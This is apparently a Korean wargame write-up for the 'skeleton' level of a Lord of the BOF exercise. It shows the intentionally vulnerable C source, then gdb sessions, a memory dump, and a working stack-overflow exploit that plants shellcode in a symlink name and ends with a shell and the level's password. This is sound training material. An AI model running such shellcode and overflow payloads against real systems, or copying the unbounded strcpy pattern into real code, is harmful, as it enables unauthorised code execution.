[vampire@localhost vampire]$ cat skeleton.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - skeleton

        - argv hunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


/*
 * Entry point of the "skeleton" level (the "argv hunter").
 *
 * Declared pre-C99 style with an implicit int return type and no return
 * statement, so the value it yields is not defined by the code. memset,
 * strlen and strcpy are used without <string.h> (only <stdio.h> and
 * <stdlib.h> are included), so they are implicitly declared -- accepted
 * by the old toolchain this level targets, an error in modern C.
 *
 * argv[1] is untrusted input. It is copied with strcpy() into a 40-byte
 * stack buffer after a check that rejects only lengths above 48, so up to
 * 49 bytes (48 plus the terminator) land in the buffer: this is the stack
 * overflow the level is built around. The defensive fix is a bounded copy
 * (snprintf(buffer, sizeof buffer, "%s", argv[1])) together with a length
 * check performed before any indexed read of argv[1].
 */
main(int argc, char *argv[])

{

        char buffer[40];        /* destination of the unbounded strcpy() below */

        int i, saved_argc;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        // egghunter
        // Zero the bytes of every environment string in place; the
        // pointers in environ are left as they are, only the contents go.

        for(i=0; environ[i]; i++)

                memset(environ[i], 0, strlen(environ[i]));


        // argv[1][47] is read before the length check further down, so for
        // an argv[1] shorter than 48 bytes this indexes past its terminator
        // into whatever follows it in memory (an out-of-bounds read).

        if(argv[1][47] != '\xbf')

        {

                printf("stack is still your friend.\n");

                exit(0);

        }


        // check the length of argument
        // Only lengths above 48 are rejected: 48 bytes plus the terminator
        // (49 in total) still pass and exceed the 40-byte buffer.

        if(strlen(argv[1]) > 48){

                printf("argument is too long!\n");

                exit(0);

        }


        // argc saver
        // Kept in a local because the final loop needs the count after
        // the argv strings themselves have been wiped.

        saved_argc = argc;


        // Unbounded copy: this is the overflow. A bounded copy
        // (snprintf(buffer, sizeof buffer, "%s", argv[1])) prevents it.

        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);


        // buffer hunter
        // Clear the local copy after it has been printed.

        memset(buffer, 0, 40);


        // ultra argv hunter! Zero out every argv[i], argv[0] included.
        // Only the strings argv points at are cleared; the memory dump later
        // on this page shows a separate copy of the program path surviving
        // this loop -- NOTE(review): presumably the exec path string placed
        // at process start, confirm before relying on this wipe.

        for(i=0; i<saved_argc; i++)

                memset(argv[i], 0, strlen(argv[i]));

        // No return statement: control falls off the end of main.

}


8번 문제인 orge->troll 문제와 비슷하지만 추가된 점은 argv[i]가 모두 제한되었다는 점이다.

8번 문제와 동일하게 etc영역에 쉘코드가 들어가도록 심볼릭링크를 이용하여 쉘코드를 이름으로 사용하기로 한다.


심볼릭링크를 이용하면 '\x2f'가 '/'로 인식이 되기 때문에 '\x2f'가 없는 쉘코드를 사용해 주어야 한다.


[vampire@localhost /tmp]$ ln -s skeleto1 `python -c 'print "\x90"*100+"\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'`

[vampire@localhost /tmp]$ gdb ./`python -c 'print "\x90"*100+"\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'`

(gdb) r `python -c 'print "\x90"*44+"\xbf\xbf\xbf\xbf"'`

Starting program: /tmp/./▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒t$▒▒i▒])ɱ

                                                         1EE▒▒▒▒b▒▒|G▒▒Rp▒▒8{▒Q▒▒▒▒-▒ѶO▒▒▒▒4@▒QM▒▒▒ `python -c 'print "\x90"*44+"\xbf\xbf\xbf\xbf"'`

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒

Program received signal SIGSEGV, Segmentation fault.

0xbfbfbfbf in ?? ()

(gdb) disas main

Dump of assembler code for function main:


중간 생략


0x8048641 <main+321>:   call   0x80483f0 <strlen>

0x8048646 <main+326>:   add    $0x4,%esp

0x8048649 <main+329>:   mov    %eax,%eax

0x804864b <main+331>:   push   %eax

0x804864c <main+332>:   push   $0x0

0x804864e <main+334>:   mov    0xffffffd4(%ebp),%eax

0x8048651 <main+337>:   lea    0x0(,%eax,4),%edx

0x8048658 <main+344>:   mov    0xc(%ebp),%eax

0x804865b <main+347>:   mov    (%eax,%edx,1),%edx

0x804865e <main+350>:   push   %edx

0x804865f <main+351>:   call   0x8048430 <memset>

0x8048664 <main+356>:   add    $0xc,%esp

0x8048667 <main+359>:   incl   0xffffffd4(%ebp)

---Type <return> to continue, or q <return> to quit---

0x804866a <main+362>:   jmp    0x8048623 <main+291>

0x804866c <main+364>:   lea    0x0(%esi,1),%esi

0x8048670 <main+368>:   leave

0x8048671 <main+369>:   ret


(gdb) b* main +368

Breakpoint 1 at 0x8048670

프로그램 맨 마지막 쯤에 bp를 걸어주고 ret주소를 \xbfbfbfbf로 덮어주고 한번 더 실행시켜 주었다.


(gdb) r `python -c 'print "\x90"*44+"\xbf\xbf\xbf\xbf"'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /tmp/./▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒t$▒▒i▒])ɱ

                                                         1EE▒▒▒▒b▒▒|G▒▒Rp▒▒8{▒Q▒▒▒▒-▒ѶO▒▒▒▒4@▒QM▒▒▒ `python -c 'print "\x90"*44+"\xbf\xbf\xbf\xbf"'`

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒


후에 etc 메모리 영역 어디에 nop와 쉘코드가 들어갔는지 파악해준다.

(gdb) x/256x 0xbfffffff -256

0xbffffeff:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffff0f:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffff1f:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffff2f:     0x00000000      0x00000000      0x00000000      0x00000000

0xbfffff3f:     0x00000000      0x00000000      0x2f000000      0x2f706d74

0xbfffff4f:     0x90902f2e      0x90909090      0x90909090      0x90909090

0xbfffff5f:     0x90909090      0x90909090      0x90909090      0x90909090

0xbfffff6f:     0x90909090      0x90909090      0x90909090      0x90909090

0xbfffff7f:     0x90909090      0x90909090      0x90909090      0x90909090

0xbfffff8f:     0x90909090      0x90909090      0x90909090      0x90909090

0xbfffff9f:     0x90909090      0x90909090      0x90909090      0x90909090

0xbfffffaf:     0x90909090      0xc5d99090      0xf42474d9      0x69c315b8

0xbfffffbf:     0xc9295dd7      0x45310bb1      0x1a45031a      0xe204c583

0xbfffffcf:     0x8f62a9e0      0x47137c93      0x7052e38e      0x1717ccb8

0xbfffffdf:     0x85f77b38      0xa98e1551      0x2d9801f3      0x4fb6d1f3

0xbfffffef:     0xfce7bf9a      0x51af4034      0xd682a14d      0x00000000

0xbfffffff:     Cannot access memory at address 0xbfffffff


ret주소를 0xbfffff6f 쯤으로 하면 안전하게 nop를 타고 쉘코드가 실행 될 것 같다.






[vampire@localhost vampire]$ ln -s skeleton `python -c 'print "\x90"*100+"\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'`

[vampire@localhost vampire]$ ./`python -c 'print "\x90"*100+"\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'` `python -c 'print "\x90"*44+"\x6f\xff\xff\xbf"'`
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒o▒▒▒
bash$ whoami
skeleton
bash$ my-pass
euid = 510
shellcoder




